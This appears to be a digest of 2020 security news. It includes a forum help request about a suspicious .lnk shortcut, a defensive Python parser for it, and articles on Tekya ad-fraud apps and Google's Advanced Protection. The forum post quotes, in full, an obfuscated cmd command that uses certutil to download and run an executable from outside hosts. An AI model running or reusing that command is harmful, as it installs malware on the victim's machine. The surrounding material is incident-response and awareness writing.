.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Posted: 06 Jul 2020 11:33 AM PDT

Hi all,

Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage. When I did double click it, I remember getting a standard Windows dialog box. I believe it said the path did not exist or shortcut unavailable. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder... I ran scans with Malwarebytes, Hitman with no results.

The .lnk file target was:

%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1

The .lnk file 'start-in' was:

"%APPDATA%\Mic…
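A static triage of the .lnk target quoted in the post above, added here as an example and not part of the original thread: it collects the SET assignments, substitutes the !VAR! references, and pulls out the certutil -urlcache download URLs, hosts and output file name for hunting or blocklisting. The function names are hypothetical, and the substitution is a simplification that does not emulate cmd.exe's evaluation order; the command is only parsed as text, never executed.

```python
import re

# The .lnk target from the post, copied verbatim. It is treated as text only.
LNK_TARGET = (
    r'%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_'
    r'%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47='
    r'certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!'
    r'||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1'
)

SET_RE = re.compile(r'(?i)\bSET\s+(\w+)=([^&|]*)')   # SET NAME=value up to & or |
REF_RE = re.compile(r'!(\w+)!')                      # delayed-expansion reference
# certutil download: optional switches, URL with a real host, then the output file
DL_RE = re.compile(
    r'(?i)certutil\s+-urlcache\s+(?:-\w+\s+)*(https?://([\w.-]+)\S*)\s+("[^"]+"|\S+)'
)


def resolve(text, variables, max_passes=5):
    """Replace !NAME! with collected SET values until nothing changes.

    Simplified static substitution (assumption): unknown names are left as-is.
    """
    for _ in range(max_passes):
        new = REF_RE.sub(lambda m: variables.get(m.group(1).upper(), m.group(0)), text)
        if new == text:
            break
        text = new
    return text


def triage(cmdline):
    """Return the indicators a responder would pivot on for this command line."""
    variables = {m.group(1).upper(): m.group(2) for m in SET_RE.finditer(cmdline)}
    hits = DL_RE.findall(resolve(cmdline, variables))
    return {
        "delayed_expansion": re.search(r'(?i)/v:on', cmdline) is not None,
        "hidden_output": '>nul' in cmdline.lower(),
        "urls": sorted({h[0] for h in hits}),
        "hosts": sorted({h[1] for h in hits}),
        "outfiles": sorted({h[2] for h in hits}),
    }


if __name__ == "__main__":
    for key, value in triage(LNK_TARGET).items():
        print(key, value)
```

The extracted hosts and the output file name can then be searched for in proxy or DNS logs and in the shortcut's 'start-in' directory.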

Android clicker malware infects kids’ games on Google Play Store - SlashGear


Posted: 24 Mar 2020 10:34 PM PDT

The COVID-19 pandemic isn't just an opportunity for some to finally embrace the work from home life, it is also an opportunity for hackers to exploit people's newfound dependence on the Internet and apps. Of course, it does seem that it's business as usual for Android users as news of yet another malware sneaking into Google Play Store surfaces. Given how it has targeted even children's games, it's a worrying precedent that needs to be nipped in the bud immediately.

The Tekya malware, as security researchers at Check Point Research have called it, surprisingly employs code obfuscation to hide its presence from anti-malware programs, including Google Play Protect. It got through undetected in 56 apps, 24 of which were aimed to keep kids preoccupied and tapping away to their hearts' content.

Unfortunately, that's exactly what this malware wants people to do. Tekya is designed to get users to click on what they think are legitimate actions. Instead, they are clicking ads on Google, Facebook, and others, generating revenue for the malware authors but at the user's expense. Kids, of course, are completely unaware of this, as are their parents or guardians who unwittingly download a clone of a game or app.

Check Point goes into more detail about the surprisingly simple method Tekya uses to bypass anti-malware protections. It also lists the 56 apps that were cloned from their originals to trick people into installing previously tested apps. All of these have reportedly been removed already but it does highlight Google Play Store's seemingly never-ending problem.

Google naturally pushes its Play ecosystem, particularly Play Store and Play Protect, as necessary parts of the Android experience. They promise a safe experience that justifies the company's process for certifying phones. Instances like this, however, deal a blow to the platform's credibility, perhaps causing some users to doubt Google Play Store entirely.

Use Google Advanced Protection to Protect Your Family Members From Android Malware - Lifehacker

Posted: 19 Mar 2020 12:05 PM PDT

The Google Play Store unwittingly hosts malicious apps, and it seems like a new batch is discovered every other week. You should be OK as long as you follow basic data security protocols, use a reliable anti-malware service, and are vigilant about removing dangerous apps whenever they're spotted. But here's the thing: These shady app developers and hackers aren't targeting users who keep their devices safe; they're after your friends and family members who don't know the risks (or stubbornly ignore them).

If you know someone who needs an extra layer of protection between them and exploitative apps, or you want to upgrade your own device's security, you should look into Google's Advanced Protection Program for Android, which now includes new malware prevention features.

The Advanced Protection Program adds extra security measures for devices and accounts, such as stricter login authentication requirements to prevent account break-ins, anti-phishing features, and restricted access to certain apps and data. As for the new anti-malware security measures, the program now:

  • Prevents devices enrolled in the program from installing non-Play Store apps—that means no more sideloading.
  • Makes Google Play Protect mandatory. Google Play Protect scans Play Store apps for malware before they're installed.
  • Scans all app activity on your device to spot potentially malicious activity.

There are exceptions to these app restrictions, however. Most importantly, some third-party apps and app stores—such as those that come preloaded on your phone or from trusted sources like Samsung—are not affected. Previously sideloaded apps should still work as long as they don't trip the Advanced Protection system scan, and users can sideload and update certain non-Play Store apps using the ADB tool on PC, but all other forms of sideloading are barred.

How to enroll in Google's Advanced Protection Program

Google's Advanced Protection Program is primarily geared towards high-risk careers, such as journalists, politicians, and other public figures, but it's open to anyone—including your luddite family members who don't understand data-security practices or have trouble discerning potentially harmful apps from real ones. You can enroll your Android device in Google's Advanced Protection Program, or help someone else enroll theirs, using this link.

Signing up requires at least two security keys to complete (your phone can probably serve as one, so you'll only need one more), and the website has several helpful videos to guide you through the process. If your goal is to prevent a loved one from downloading harmful apps, you may want to create an account and add their device so that you're in charge of it—that way they won't disable the protection, lock themselves out of their device, or accidentally change important settings.

Google Play Store distributed malicious ad-fraud apps designed for kids - 2-spyware.com

Posted: 24 Mar 2020 08:25 AM PDT

Tekya malware was downloaded almost 1 million times

Android apps for kids involved in ad fraud

Check Point security researchers found that Android applications designed for kids distributed malware dubbed Tekya.[1] More than 50 apps on the Google Play Store were discovered using a new trick to mimic users' clicks on ads.[2] This malware imitated users' actions to click commercial content from advertising networks like Google's AdMob, AppLovin, Facebook, and Unity without the person's knowledge. Experts also revealed that these malicious apps were downloaded almost 1 million times. The researchers[3] say:

Twenty four of the infected apps were aimed at children (ranging from puzzles to racing games), with the rest being utility apps (such as cooking apps, calculators, downloaders, translators, and so on).

These 56 applications included the software that leveraged devices to click on mobile advertisements, so the traffic on those ads and commercial sites is inflated artificially – this is how scammers get to make money from pay-per-click techniques.[4] Applications with titles like Let Me Go and Cooking Delicious attracted kids to download them onto tablets and other mobile devices running Android OS, so the Tekya malware is launched without causing any additional symptoms or asking for special permissions.

Clicker malware simulates users' actions 

Tekya Clicker was hidden in 24 mobile games for children and 32 utility applications, so scam campaigns could be launched and generate money for criminals. The malware clicked on ads from various sources and was embedded in cooking, calculator, translation, and similar tools. Even though all applications were removed from the Google Play Store, almost a million downloads were made.

Once the user installed the malicious application, the malware registered a receiver – an Android component that gets invoked when a certain app or system event occurs. It happens when the user is actively using the mobile device, for example, when it restarts. This receiver detects such an event and proceeds to load a native library, libtekya.so, which includes a sub-function that creates and launches touch events. The malware mimics a click via the MotionEvent API, which has been in use since last year, and this is the precise technique that Tekya Clicker abused.

Mobile malware and fraudulent ad campaigns on the rise

Advertising campaigns target various devices and people; scammers manage to get their goals achieved by relying on different techniques. Threat actors can plant malware-laced commercial content on user phones and embed malware in apps or online services to generate views, clicks and receive payouts. 

Google tries to protect users from potentially harmful applications, but even partnerships with cybersecurity firms and constant moderation cannot keep users completely secure all the time. Therefore, staying vigilant and employing extra security measures (such as anti-malware for Android) is extremely important when it comes to safety, especially when it comes to kids.

Researchers constantly report on instances when malicious apps act out in the background or even deliver malware.[5] The malicious operators managed to pull some of these applications from the Google Play Store once they were flagged, and others were removed by Google. If you have any installed, delete them and scan the phone or tablet using an AV app to make sure no PUPs were placed on the system without your knowledge.
